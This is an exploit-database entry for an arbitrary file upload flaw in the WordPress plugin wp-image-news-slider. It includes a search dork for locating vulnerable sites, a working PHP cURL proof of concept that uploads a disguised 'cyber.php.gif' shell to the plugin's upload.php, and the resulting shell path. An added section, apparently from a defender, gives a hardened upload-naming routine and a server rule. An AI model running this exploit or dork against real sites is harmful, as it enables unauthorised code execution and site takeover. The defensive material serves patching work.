Wordpress plugin wp-image-news-slider Arbitrary File Upload Vulnerability


# Exploit Title: Wordpress plugin wp-image-news-slider Arbitrary File Upload Vulnerability
# Date: 21/01/2013
# Author: The Black Devils
# Home: 1337day Exploit DataBase 1337day.com
# Category : [ webapps ]
# Dork : inurl:wp-content/plugins/wp-image-news-slider
# Type : php
# Tested on: [Windows] & [Ubuntu]
#------------------

# Poc :

<?php
$uploadfile="cyber.php.gif";
$ch = curl_init("http://localhost/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://localhost/[path]/wp-content/uploads/random_name.php.gif

<?php
phpinfo();
?>
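Added here as a defender's counterpart, not part of the original advisory or of the plugin's code: a hardened filename and type routine for an image upload handler such as the upload.php above. The 'Filedata' field name comes from the PoC; the function name, the whitelist and the uploads path are assumptions.

```php
<?php
// Added example (not the plugin's code). The weakness in the PoC is that the
// stored name keeps the client's extension chain (cyber.php.gif), which
// mod_mime-style servers may hand to the PHP interpreter. The fix below never
// lets the client choose any part of the stored name.
declare(strict_types=1);

// Server-chosen extension per detected MIME type (assumed whitelist).
const ALLOWED_IMAGE_TYPES = [
    'image/gif'  => 'gif',
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
];

// Returns a safe destination filename, or null if the upload must be rejected.
function safe_image_name(string $tmpPath, string $clientName): ?string
{
    // 1. Defence in depth: refuse names with a ".php" segment or more than
    //    one extension, even though the stored name ignores them anyway.
    $base = basename($clientName);
    if (preg_match('/\.php/i', $base) || substr_count($base, '.') !== 1) {
        return null;
    }

    // 2. Detect the content type from the bytes, not from the name.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($tmpPath);
    if ($mime === false || !isset(ALLOWED_IMAGE_TYPES[$mime])) {
        return null;
    }

    // 3. Structural sanity check. A GIF header followed by PHP code still
    //    passes this, so the control that matters is the name in step 4.
    if (@getimagesize($tmpPath) === false) {
        return null;
    }

    // 4. Random name with a single extension picked by the server.
    return bin2hex(random_bytes(16)) . '.' . ALLOWED_IMAGE_TYPES[$mime];
}

// Hypothetical use inside the handler:
// if (!is_uploaded_file($_FILES['Filedata']['tmp_name'])) { http_response_code(400); exit; }
// $name = safe_image_name($_FILES['Filedata']['tmp_name'], $_FILES['Filedata']['name']);
// if ($name === null) { http_response_code(415); exit; }
// move_uploaded_file($_FILES['Filedata']['tmp_name'], WP_CONTENT_DIR . '/uploads/' . $name);
```

Pair this with a web-server rule that refuses to execute PHP under wp-content/uploads, so a polyglot image that slips through is still served as a static file.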

#------------------

#Demo :
#------------------

#Contact:

https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios

#------------------

        #  1337day.com [2015-04-05]  #
